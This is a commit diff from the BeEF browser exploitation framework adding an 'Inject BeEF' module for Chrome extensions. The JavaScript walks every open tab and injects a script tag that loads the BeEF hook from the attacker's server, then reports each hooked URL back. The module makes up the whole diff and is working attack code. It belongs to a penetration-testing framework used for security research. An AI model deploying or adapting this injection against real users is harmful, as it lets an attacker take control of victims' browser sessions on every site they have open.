(Fixes issue 507): added Chrome extension exploit that injects the BeEF hook on all the available tabs. Works great!

git-svn-id: https://beef.googlecode.com/svn/trunk@1309 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9

modules/chrome_extensions/inject_beef/command.js

@@ -0,0 +1,26 @@
+beef.execute(function() {
+
+        var beefHookUri = "http://" + beef.net.host + ":" + beef.net.port + beef.net.hook;
+
+        chrome.windows.getAll({"populate" : true}, function(windows) {
+			for(i in windows) {
+				if(windows[i].type=="normal") {
+					chrome.tabs.getAllInWindow(windows[i].id,function(tabs){
+						for(t in tabs) {
+                            //antisnatchor: if the extension has her own tabs open, we want to precent injecting the hook
+                            //also there. Chrome extensions with tabs and http/s permissions cannot access URIs with protocol
+                            // handlers chrome-extension://, and most of them will not have permissions to do so.
+                            if(tabs[t].url.substring(0,16) != "chrome-extension"){
+                                chrome.tabs.executeScript(tabs[t].id,{code:"newScript=document.createElement('script'); newScript.src='"
+                                    + beefHookUri + "'; newScript.setAttribute('onload','beef_init()'); document.getElementsByTagName('head')[0].appendChild(newScript);"})
+
+						        //send back the new domain that will be hooked :-)
+                                beef.net.send('<%= @command_url %>', <%= @command_id %>, 'Succesfully injected BeEF hook on: ' + tabs[t].url);
+                            }
+						}
+					})
+				}
+			}
+		});
+});
+

modules/chrome_extensions/inject_beef/config.yaml

@@ -0,0 +1,10 @@
+beef:
+    module:
+        inject_beef:
+            enable: true
+            category: "Chrome Extensions"
+            name: "Inject BeEF"
+            description: "Attempt to inject the BeEF hook on all the available tabs."
+            authors: ["Kos", "antisnatchor"]
+            target:
+                working: ["C"]

modules/chrome_extensions/inject_beef/module.rb

@@ -0,0 +1,9 @@
+class Inject_beef < BeEF::Core::Command
+
+  def post_execute
+    content = {}
+    content['Return'] = @datastore['return']
+    save content
+  end
+  
+end